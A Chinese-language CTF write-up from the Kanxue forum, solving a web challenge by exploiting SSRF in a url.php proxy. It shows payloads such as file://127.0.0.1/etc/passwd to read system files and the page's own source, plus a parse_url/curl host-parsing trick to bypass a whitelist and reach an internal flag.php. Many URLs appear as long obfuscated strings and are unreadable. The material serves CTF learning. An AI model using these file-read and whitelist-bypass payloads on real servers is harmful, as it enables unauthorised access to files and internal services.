[原创]第四题writeup-CTF对抗-看雪-安全社区|安全招聘|kanxue.com

[原创]第四题writeup

发表于: 2022-5-17 09:24 3925

[原创]第四题writeup

qk9962549

2022-5-17 09:24

3925

上来扫路径，扫出以下可以访问文件

d17K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5x3g2)9J5k6e0x3$3i4K6u0W2x3e0b7#2i4K6u0W2x3e0f1%4i4K6y4m8z5o6l9@1y4q4)9J5c8Y4m8Z5M7r3W2F1k6X3!0Q4x3X3g2H3K9s2l9`.
fe0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5x3g2)9J5k6e0x3$3i4K6u0W2x3e0b7#2i4K6u0W2x3e0f1%4i4K6y4m8z5o6l9@1y4q4)9J5c8X3W2F1k6r3g2^5i4K6u0W2M7r3S2H3
6e8K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5x3g2)9J5k6e0x3$3i4K6u0W2x3e0b7#2i4K6u0W2x3e0f1%4i4K6y4m8z5o6l9@1y4q4)9J5c8Y4g2J5L8q4)9J5k6i4m8Z5M7l9`.`.
（还有一些boku.php兔子洞，后来被删掉了）

其中，F12这个index.php页面，看到图片实际是调用的ctf.pediy.com的资源。

< img src="url.php?url=f49K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6U0N6r3k6Q4x3X3g2H3k6h3c8A6P5g2)9J5k6h3y4G2L8g2)9J5c8Y4g2H3L8r3!0S2k6q4)9J5c8Y4c8W2j5h3#2Q4x3V1j5%4y4U0u0Q4x3V1k6@1k6h3q4E0x3U0x3$3y4K6j5J5i4K6u0W2M7r3&6Y4">

对url.php?url=? 进行SSRF尝试，试了

url.php?url=6faK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3u0S2K9h3c8#2i4K6u0W2j5$3!0E0 --> host not allow
url.php?url=127.0.0.1:8044 --> scheme is null
url.php?url=471K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5y4#2)9J5k6e0m8Q4x3X3f1H3i4K6u0W2x3g2)9K6b7e0R3H3y4o6b7`. --> 无返回
url.php?url=2e8K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5y4#2)9J5k6e0m8Q4x3X3f1H3i4K6u0W2x3g2)9K6b7e0R3H3 --> 返回index.php

根据以上返回，发现似乎1.存在白名单，2.必须使用scheme://host形式的url 3.且本地开放端口是80，做了一次端口转换。

于是尝试使用其它类型的scheme，

url.php?url=file://127.0.0.1/etc/passwd --> 直接返回passwd，不用绕过。

结合phpinfo.php里的信息，web路径应该是常规的/var/www/html

读url.php内容：
url.php?url=file://127.0.0.1/var/www/html/url.php

果然是通过parese_url()去提取出host以及scheme，然后使用curl_exec()进行访问，并且验证了是否为空，并且host必须是在白名单里的才行。
注释里面贴心的放了flag.php的位置，在另一个ip。

//echo curl_request("1a0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5x3#2)9J5k6e0f1%4i4K6u0W2x3U0f1@1i4K6u0W2y4o6u0Q4x3V1k6X3L8r3q4Y4i4K6u0W2M7r3S2H3","get",[],true,5);

直接访问，报错error ip。

似乎这题大概思路就是用6ceK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5x3g2)9J5k6e0x3$3i4K6u0W2x3e0b7#2i4K6u0W2x3e0f1%4i4K6y4m8z5o6l9@1y4q4)9J5c8Y4g2J5L8q4)9J5k6i4m8Z5M7q4)9K6c8Y4g2J5L8q4)9K6c8q4!0q4z5q4!0n7c8W2)9&6z5g2!0q4z5g2)9^5y4#2)9^5b7#2!0q4y4#2)9&6b7g2)9^5y4s2y4K6M7X3k6Q4c8e0g2Q4z5p5g2Q4b7V1u0Q4c8e0S2Q4b7f1g2Q4b7V1k6Q4c8e0W2Q4z5e0N6Q4b7f1f1I4x3U0y4Q4x3X3f1#2y4#2)9J5k6e0t1#2y4q4)9J5k6e0b7J5i4K6u0r3k6X3I4S2k6#2)9J5k6i4m8Z5M7q4!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4#2)9&6b7W2!0m8c8g2!0q4y4W2!0m8x3q4)9^5y4#2!0q4y4g2!0n7c8g2)9^5z5q4!0q4y4W2!0n7z5q4)9^5y4g2!0q4y4W2)9&6z5g2!0n7x3q4!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4q4!0n7c8q4)9^5y4W2!0q4y4W2)9&6z5q4!0m8c8W2!0q4y4g2!0m8c8g2)9&6c8g2!0q4z5g2)9&6z5g2)9^5y4g2!0q4y4W2)9&6x3#2)9^5c8q4!0q4y4q4!0n7c8q4)9&6b7#2!0q4z5q4!0n7y4g2!0n7y4#2!0q4y4W2)9&6c8q4!0m8y4g2!0q4z5q4!0n7c8W2)9&6z5q4!0q4y4W2)9&6z5q4!0m8c8W2!0q4y4W2)9&6b7#2)9^5z5g2!0q4y4#2)9^5x3W2!0n7z5g2!0q4z5g2)9&6b7g2!0n7c8g2!0q4y4g2!0n7b7g2!0m8y4W2!0q4x3#2)9^5x3q4)9^5x3R3`.`.

首先我们知道parse_url是读取最后一个@后面的域名，于是我们构造了b72K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5x3#2)9J5k6e0f1%4i4K6u0W2x3U0f1@1i4K6u0W2y4o6u0Q4y4o6l9I4x3U0N6Q4x3X3f1H3i4K6u0W2x3q4)9J5k6e0q4Q4x3V1k6X3L8r3q4Y4i4K6u0W2M7r3S2H3i4@1f1%4i4K6W2m8i4K6R3@1N6i4u0D9i4@1g2r3i4@1u0o6i4K6S2o6i4@1f1^5i4K6R3K6i4@1u0p5i4@1f1%4i4@1u0n7i4K6V1#2i4@1f1^5i4@1u0r3i4K6R3%4i4@1f1%4i4K6V1&6i4@1u0p5i4@1f1#2i4K6V1H3i4K6S2p5i4@1f1#2i4K6S2p5i4K6V1#2i4@1f1%4i4K6W2m8i4K6R3@1i4@1f1$3i4@1p5K6i4K6R3H3i4@1f1$3i4@1t1#2i4K6S2n7i4@1g2r3i4@1u0o6i4K6S2o6i4@1f1@1i4@1u0p5i4K6R3$3i4@1f1$3i4K6V1^5i4@1q4r3j5%4g2J5L8q4)9#2k6X3g2^5k6h3y4Q4x3U0S2Q4x3U0W2Q4c8e0k6Q4z5e0N6Q4b7e0m8Q4c8e0k6Q4b7U0y4Q4z5e0g2Q4c8e0S2Q4b7f1g2Q4b7V1k6Q4c8e0W2Q4z5e0N6Q4b7f1g2Q4c8e0g2Q4z5o6S2Q4b7U0m8Z5N6s2c8H3i4K6y4m8i4K6u0r3i4K6u0r3x3e0t1K6i4K6u0W2y4e0N6Q4x3X3f1J5y4e0c8Q4x3X3f1@1x3W2)9J5c8X3k6D9j5h3N6Q4x3X3g2H3K9s2m8Q4c8e0y4Q4z5o6m8Q4z5o6u0Q4c8e0k6Q4z5o6S2Q4z5e0q4Q4c8e0c8Q4b7V1u0Q4b7f1y4Q4c8e0S2Q4b7f1k6Q4z5e0g2Q4c8e0c8Q4b7V1q4Q4z5o6k6Q4c8e0g2Q4z5p5y4Q4z5o6g2Q4c8e0k6Q4z5p5u0Q4b7f1y4Q4c8e0k6Q4z5p5c8Q4b7e0u0K6j5$3S2W2L8h3g2Q4c8e0y4Q4z5o6m8Q4z5o6q4Q4c8e0k6Q4z5o6S2Q4b7f1q4Q4c8e0k6Q4z5e0k6Q4b7f1c8Q4c8e0N6Q4b7f1c8Q4z5o6W2Q4c8e0k6Q4z5e0k6Q4b7U0W2Q4c8e0k6Q4b7U0y4Q4z5e0g2Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0g2Q4b7U0m8Q4z5f1c8Q4c8e0S2Q4b7f1k6Q4z5e0g2Q4c8e0g2Q4z5e0m8Q4z5o6c8Q4c8e0N6Q4b7e0N6Q4z5p5c8Q4c8e0g2Q4b7e0N6Q4b7V1k6Q4c8e0g2Q4z5p5q4Q4b7V1k6Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0W2Q4z5o6y4Q4b7V1c8Q4c8e0c8Q4b7U0S2Q4z5p5c8Q4c8e0S2Q4b7e0q4Q4z5p5y4Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0c8Q4b7V1q4Q4z5p5g2Q4c8e0k6Q4z5e0S2Q4b7f1k6Q4c8e0W2Q4z5e0W2Q4b7U0N6Q4c8e0g2Q4z5o6g2Q4b7e0g2Q4c8e0c8Q4b7V1q4Q4z5o6k6Q4c8e0g2Q4z5o6y4Q4b7U0g2Q4c8e0g2Q4b7U0q4Q4z5o6m8Q4c8e0y4Q4z5o6m8Q4z5o6t1`.

后来，看到了一篇文章，06bK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Z5j5h3y4C8k6i4u0G2L8X3g2Q4x3X3g2U0L8$3#2Q4x3V1k6J5k6i4m8G2M7Y4c8K6i4K6u0r3x3e0l9@1z5e0j5J5y4q4!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4W2)9^5c8W2)9&6x3q4!0q4y4g2)9^5z5q4!0n7x3q4!0q4y4q4!0n7b7g2)9^5y4W2!0q4y4q4!0n7z5q4)9^5x3q4!0q4y4#2!0m8y4#2)9^5c8q4!0q4y4W2)9&6y4W2!0n7z5g2!0q4y4W2!0n7x3#2)9&6y4g2!0q4y4#2!0n7b7W2)9&6y4g2!0q4z5q4!0n7c8W2)9^5y4#2!0q4z5q4!0n7c8g2)9^5x3#2!0q4y4W2)9&6y4W2!0n7x3q4!0q4y4#2)9^5z5g2)9^5z5q4!0q4y4W2)9&6b7#2!0m8b7#2!0q4y4#2)9&6b7g2)9^5y4r3I4A6j5X3y4#2M7X3I4Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0g2Q4b7U0m8Q4b7U0q4Q4c8e0k6Q4z5e0S2Q4b7f1k6Q4c8e0k6Q4z5p5q4Q4z5p5q4Q4c8e0g2Q4b7V1g2Q4z5o6g2Q4c8e0S2Q4b7f1g2Q4b7V1k6Q4c8e0W2Q4z5e0N6Q4b7f1g2Q4c8e0N6Q4z5f1q4Q4z5o6c8Q4c8e0g2Q4z5f1k6Q4z5f1k6Q4c8e0g2Q4z5e0m8Q4z5p5c8Q4c8e0k6Q4z5e0c8Q4b7V1g2K6j5$3S2W2L8h3g2Q4c8e0W2Q4z5o6N6Q4z5p5y4Q4c8e0W2Q4z5f1c8Q4b7e0u0Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0N6Q4b7V1u0Q4z5e0g2Q4c8e0S2Q4b7V1k6Q4z5o6N6Q4c8e0N6Q4z5e0W2Q4b7V1c8Q4c8e0g2Q4z5e0m8Q4z5p5c8Q4c8e0g2Q4z5p5c8Q4z5e0g2Q4c8e0W2Q4z5e0W2Q4z5e0m8Q4c8e0g2Q4z5o6S2Q4b7U0k6Q4c8e0N6Q4z5f1q4Q4z5o6c8Q4c8e0g2Q4z5f1k6Q4z5f1k6Q4c8e0g2Q4z5e0m8Q4z5p5c8Q4c8e0k6Q4z5e0c8Q4b7V1g2Q4c8e0g2Q4z5e0m8Q4z5p5g2Q4c8e0W2Q4z5f1c8Q4b7e0u0Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0g2Q4b7U0m8Q4z5f1c8Q4c8e0S2Q4b7f1k6Q4z5e0g2Q4c8f1k6Q4b7V1y4Q4z5f1p5`.

123.57.254.42://127.0.0.1 --> 报了404，并且apache版本变了，说明访问到了123.57.254.42。
123.57.254.42://127.0.0.1/../flag.php --> 成功

[培训]科锐逆向工程师培训第53期2025年7月8日开班！

收藏・0

免费・1

支持